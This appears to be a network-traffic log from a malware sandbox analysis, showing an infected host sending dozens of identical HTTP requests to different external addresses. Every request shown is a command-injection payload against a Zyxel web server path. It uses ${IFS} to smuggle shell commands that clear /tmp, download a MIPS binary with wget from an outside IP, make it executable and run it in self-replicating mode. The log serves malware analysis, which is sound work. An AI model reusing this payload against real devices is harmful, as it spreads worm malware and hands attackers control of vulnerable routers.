                                              Jan 29, 2024 07:04:08.371809959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8975192.168.2.1442454221.94.250.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371845007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8976192.168.2.14563221.225.163.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371911049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8977192.168.2.1441380134.177.118.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371948957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8978192.168.2.143528625.253.218.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371984959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8979192.168.2.144173447.13.81.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372028112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8980192.168.2.144792231.231.127.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372055054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8981192.168.2.1436938164.116.29.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372088909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8982192.168.2.143335275.47.156.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372132063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8983192.168.2.1445790190.120.59.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372181892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8984192.168.2.1459342131.55.255.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372219086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8985192.168.2.145142883.175.133.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372248888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8986192.168.2.1445722140.215.105.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372282028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8987192.168.2.144162070.92.93.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372339964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8988192.168.2.146034678.2.47.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372379065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8989192.168.2.1446454139.137.230.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372412920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8990192.168.2.1456674108.137.179.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372461081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8991192.168.2.1445220106.223.53.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372497082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8992192.168.2.145110266.136.245.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372524977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8993192.168.2.1442260154.122.132.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372565985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8994192.168.2.143363054.103.91.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372608900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8995192.168.2.1455572125.227.11.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372648001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8996192.168.2.143307890.224.40.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372680902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8997192.168.2.1443542131.147.81.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372731924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8998192.168.2.1454242191.71.16.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372770071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8999192.168.2.1445920122.41.72.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372805119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9000192.168.2.14581688.137.166.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372869968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9001192.168.2.1436316154.150.59.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372878075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9002192.168.2.1445892216.153.227.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372915030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9003192.168.2.1440184207.210.9.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372960091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9004192.168.2.1446312124.123.31.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.372992992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9005192.168.2.1451060223.41.58.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.373039961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9006192.168.2.1444082170.237.17.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.373070955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9007192.168.2.144145474.246.162.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.373111963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9008192.168.2.143519489.77.117.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.373146057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9009192.168.2.145059842.100.65.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.373199940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9010192.168.2.1457370211.164.125.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.373233080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9011192.168.2.145167273.94.173.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.376275063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9012192.168.2.143418631.202.32.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.376315117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9013192.168.2.1457618126.34.26.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.376346111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9014192.168.2.1439650168.3.67.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.376949072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9015192.168.2.1457110207.8.101.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.376976013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9016192.168.2.146049258.162.106.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.377027988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9017192.168.2.1436656184.203.77.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.377039909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9018192.168.2.1456986140.135.126.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.377065897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9019192.168.2.145600449.152.216.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.377091885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9020192.168.2.1458684104.195.48.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.377142906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9021192.168.2.144345895.45.218.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.377192974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9022192.168.2.1442166122.70.102.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.377214909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9023192.168.2.1452146202.55.75.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.377243042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9024192.168.2.1460858219.243.180.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.377275944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9025192.168.2.1453604126.90.210.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.377307892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9026192.168.2.145288086.67.157.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.377327919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9027192.168.2.1440314169.208.204.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.377365112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9028192.168.2.1448834197.27.179.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.377408981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9029192.168.2.1450766150.198.153.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.377434969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9030192.168.2.1458828154.179.86.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.377485037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9031192.168.2.1437270223.201.106.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.377511024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9032192.168.2.145413663.8.60.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.377537966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9033192.168.2.14596228.148.168.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.377564907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9034192.168.2.143489660.34.64.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.377619982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9035192.168.2.1450332222.233.28.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.384380102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9036192.168.2.1448282126.210.197.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.384407997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9037192.168.2.1459650140.85.102.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.384450912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9038192.168.2.1434246122.159.41.192443
                                              TimestampBytes transferredDirectionData
